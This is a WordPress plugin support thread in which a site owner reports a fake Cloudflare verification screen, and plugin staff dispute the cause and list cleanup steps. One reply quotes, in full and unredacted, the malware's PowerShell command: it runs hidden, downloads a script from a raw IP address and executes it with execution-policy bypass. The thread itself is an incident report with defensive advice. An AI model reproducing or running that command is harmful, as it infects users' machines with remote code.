Title: Virus alert on Code Snippets Plugin Last modified: July 17, 2025 --- # Virus alert on Code Snippets Plugin * Resolved [Bruno Martinez](https://wordpress.org/support/users/brmartinez/) * (@brmartinez) * [9 months, 1 week ago](https://wordpress.org/support/topic/virus-alert-on-code-snippets-plugin/) * Hello, I’ve recently noticed that this plugin is infected with a virus that shows a “fake cloudlfare” screen. It instructs the user to copy and past a code in the the command screen (Windows CMD). [https://www.loom.com/share/2d5e34d7bb074b219bdbe2511dc5af2b?sid=0bd6a140-3177-458c-b352-5a1966916106](https://www.loom.com/share/2d5e34d7bb074b219bdbe2511dc5af2b?sid=0bd6a140-3177-458c-b352-5a1966916106) * Please be aware this is happening and check if you can make it more secure. I’ve had to remove the plugin, to fix the virus issue on my website. * Thanks! Viewing 9 replies - 1 through 9 (of 9 total) * [Jeff Mankini](https://wordpress.org/support/users/jeffmankini/) * (@jeffmankini) * [9 months, 1 week ago](https://wordpress.org/support/topic/virus-alert-on-code-snippets-plugin/#post-18560413) * Hi Bruno, * It looks like your site may be infected with malware. From what I can see, this doesn’t appear to be coming from the Code Snippets plugin itself, but rather from a malicious script that’s been added somewhere on your site. * Do you happen to recall any of the last few snippets you may have added? That might help us narrow down where this could be coming from. * Cheers, * Jeff The Code Snippets Team * Thread Starter [Bruno Martinez](https://wordpress.org/support/users/brmartinez/) * (@brmartinez) * [9 months ago](https://wordpress.org/support/topic/virus-alert-on-code-snippets-plugin/#post-18571147) * Hello, answering your inquiries: 1. No, the malware script was found in your plugin. Removing your plugin removed the virus. We’ve tried this twice (reinstalling it opened the door for a new infection, so we’ve had to remove it again); 2. No, we’re not using your plugin anymore, and since then, we haven’t had any infections (its a pitty, actually, because your plugin is really great. Congrats for that, by the way). * Here’s a list of all our snippets: * ```wp-block-code Rank Math Rules Exclusions (PHP)===============================/** * Filter to disable some tests */add_filter('rank_math/researches/tests', function ($tests, $type) {unset($tests['titleHasNumber']);unset($tests['lengthPermalink']);unset($tests['hasContentAI']);unset($tests['keywordInMetaDescription']);    unset($tests['contentHasTOC']);unset($tests['keywordDensity']);unset($tests['keywordInSubheadings']);unset($tests['lengthContent']);return $tests;}, 10, 2 );Rank Math Filter to change the Post Meta Table Limit (PHP)=============================== /** * Filter to change the Post Meta Table Limit */add_filter('rank_math/seo_analysis/postmeta_table_limit', function ( $limit ) {return 5000000;});RankMath Clear flush sitemap cache (PHP)=============================== add_filter( 'rank_math/sitemap/enable_caching', '__return_false');Rank Math Filter Fast indexing API error fix (PHP)add_filter( 'doing_it_wrong_trigger_error', '__return_false' );Filter to add Locations KML file in the sitemap (PHP) =============================== /** * Filter to add Locations KML file in the sitemap */add_filter( 'rank_math/sitemap/locations', '__return_true' );Modify imagify picture tag (PHP)=============================== add_filter( 'imagify_buffer', function( $html ) {    // Apply changes only inside
blocks    $html = preg_replace_callback(        '#]*class=["\'][^"\']*cs-overlay-background[^"\']*["\'][^>]*>(.*?)
#is',        function ( $divMatches ) {            $divContent = $divMatches[1];            // Modify picture tags WITH style attribute            $divContent = preg_replace_callback(                '/]*?)style\s*=\s*["\']([^"\']*)["\']([^>]*)>/i',                function ( $matches ) {                    $style = $matches[2];                    if ( stripos( $style, 'height' ) === false ) {                        $style = rtrim( $style, '; ' ) . '; height:100%;';                    }                    return '';                },                $divContent            );            // Modify picture tags WITHOUT style attribute            $divContent = preg_replace(                '/]*\bstyle=)([^>]*)>/i',                '',                $divContent            );            // Return modified div            return str_replace($divMatches[1], $divContent, $divMatches[0]);        },        $html    );    return $html;} );Mastodon Tag (HTML)===============================  ``` * if you need anything else, just let me know. * Kind regards and thanks for helping out! 🙂 * Plugin Author [Shea Bunge](https://wordpress.org/support/users/bungeshea/) * (@bungeshea) * [8 months, 4 weeks ago](https://wordpress.org/support/topic/virus-alert-on-code-snippets-plugin/#post-18573562) * Hi [@brmartinez](https://wordpress.org/support/users/brmartinez/), * I can confirm we don’t have anything remotely like that in the distributed plugin– we don’t even have anything to do with CloudFlare. * It’s possible that your _copy_ of the plugin became infected somehow, and if so, it points to a vulnerability in your system that I’d definitely recommend trying to identify. Once dealt with, redownloading a fresh copy of the plugin from this site should resolve issues. * Thread Starter [Bruno Martinez](https://wordpress.org/support/users/brmartinez/) * (@brmartinez) * [8 months, 4 weeks ago](https://wordpress.org/support/topic/virus-alert-on-code-snippets-plugin/#post-18574227) * By your answer, it seems you didn’t understand how the virus works: it SIMULATES a FAKE CloudFlare screen. So it does not relate to the official Cloudflare service at all, ok? * I’ve removed the plugin, then reinstalled it. After a few days, the virus returned. * In my latest test, I’ve now removed the plugin again, then deleted leftover tables from it, and installed it again. I’ll let you know if the virus returns. * Plugin Author [Shea Bunge](https://wordpress.org/support/users/bungeshea/) * (@bungeshea) * [8 months, 4 weeks ago](https://wordpress.org/support/topic/virus-alert-on-code-snippets-plugin/#post-18574473) * I understand your description of what’s happening – I was suggesting the improbability of it being tied up with the distributed plugin code as the behaviour you describe is not remotely close to the plugin’s functionality. * Can I ask where you found the malware script in the plugin? Which source file etc? * Thread Starter [Bruno Martinez](https://wordpress.org/support/users/brmartinez/) * (@brmartinez) * [8 months, 4 weeks ago](https://wordpress.org/support/topic/virus-alert-on-code-snippets-plugin/#post-18575913) * The devs at my server found it. Here’s what they’ve explained to me in July 10th: * “We’ve found malware on your site and the same was related to the ” code-snippets” plugin. This malware is particularly dangerous, as shows a fake Cloudflare screen that prompts the user to execute of a PowerShell command that downloads and runs a script: * powershell -w h -c “$f=$env:TEMP+’\\’+[guid]::NewGuid()+’.ps1′;curl [http://185.100.157.79/wXq.dof](http://185.100.157.79/wXq.dof)- o $f;powershell -w h -ep Bypass -f $f” * Currently, the plugin is enabled, and if you disable it, the required authentication( fake Cloudflare page) will not be presented.” * Plugin Author [Imants](https://wordpress.org/support/users/0aksmith/) * (@0aksmith) * [8 months, 3 weeks ago](https://wordpress.org/support/topic/virus-alert-on-code-snippets-plugin/#post-18576473) * Hi [@brmartinez](https://wordpress.org/support/users/brmartinez/), * Thanks so much for following up and sharing the details. I really appreciate the time you’ve taken to test and report what you’re seeing. * From your description, it does sound like the Code Snippets plugin may be getting leveraged directly, or as part of a broader exploit chain, especially given the flexibility it offers for running custom code. I completely understand how concerning this must be, and I want to reassure you that we take this seriously. Here are some steps we recommend to help secure and restore your WordPress site: - **Activate Code Snippets Safe Mode:** This pauses all snippets so you can safely access your site and troubleshoot without executing custom code. See: [](https://codesnippets.pro/doc/help-my-site-broke-how-can-i-fix-it/)[Help! My site broke! How can I fix it?](https://codesnippets.pro/doc/help-my-site-broke-how-can-i-fix-it/) - **Reinstall WordPress Core:** Replace all core WordPress files with fresh copies to eliminate any hidden backdoors. - **Check and Clean Critical Directories:** * Look through the `uploads` folder for any unfamiliar files. * Review post content, custom fields, and database entries for hidden or obfuscated scripts. * Inspect your `wp-config.php` file for any unauthorized changes. - **Audit Users and Permissions:** * Remove any unknown admin users. * Update passwords for all admin accounts, and change your database and FTP credentials. - **Update All Plugins and Themes:** * Remove any unused or untrusted plugins/themes. * Make sure everything is running the latest secure version. - **Restore from a Clean Backup (if available):** If you have a backup from before the issue started, restoring it can be a great way to get back to a clean state. - **Scan for Malware and Vulnerabilities:** Use a trusted security plugin like Patchstack, Wordfence, Sucuri, or Jetpack Protect to scan your site for hacked files, suspicious code, or vulnerabilities. - **Review Recent Snippets:** * Disable or delete any snippets that you didn’t add or that look suspicious. * Look out for snippets that could allow uploads or remote code execution. * Also, just a quick note: when sharing examples or links, please try to remove or redact any direct URLs in malicious payloads, like: `http[:]//cant.click/here` This helps keep others safe from accidentally clicking on them. * If you ever come across a vulnerability in the plugin itself, we’d really appreciate it if you could contact us directly here: [https://codesnippets.pro/contact/](https://codesnippets.pro/contact/) * Thread Starter [Bruno Martinez](https://wordpress.org/support/users/brmartinez/) * (@brmartinez) * [8 months, 3 weeks ago](https://wordpress.org/support/topic/virus-alert-on-code-snippets-plugin/#post-18576616) * Thanks. Can someone in your team be available to help me out with these tasks? I’m not a developer and I don’t have one, so I won’t be able to follow on this alone. * Plugin Author [Imants](https://wordpress.org/support/users/0aksmith/) * (@0aksmith) * [8 months, 3 weeks ago](https://wordpress.org/support/topic/virus-alert-on-code-snippets-plugin/#post-18576648) * Bruno. Our team specializes primarily in plugin development, so when it comes to dealing with security issues or cleaning up malicious files, your hosting provider is often best equipped to help.Given the gravity of the exploit found on your site, I highly recommend reaching out to professional WordPress incident response services as they will have the expertise and tools to help you fully secure, recover and protect your website. Viewing 9 replies - 1 through 9 (of 9 total) The topic ‘Virus alert on Code Snippets Plugin’ is closed to new replies. * ![](https://ps.w.org/code-snippets/assets/icon.svg?rev=2148878) * [Code Snippets](https://wordpress.org/plugins/code-snippets/) * [Frequently Asked Questions](https://wordpress.org/plugins/code-snippets/#faq) * [Support Threads](https://wordpress.org/support/plugin/code-snippets/) * [Active Topics](https://wordpress.org/support/plugin/code-snippets/active/) * [Unresolved Topics](https://wordpress.org/support/plugin/code-snippets/unresolved/) * [Reviews](https://wordpress.org/support/plugin/code-snippets/reviews/) * 11 replies * 4 participants * Last reply from: [Imants](https://wordpress.org/support/users/0aksmith/) * Last activity: [8 months, 3 weeks ago](https://wordpress.org/support/topic/virus-alert-on-code-snippets-plugin/#post-18576648) * Status: resolved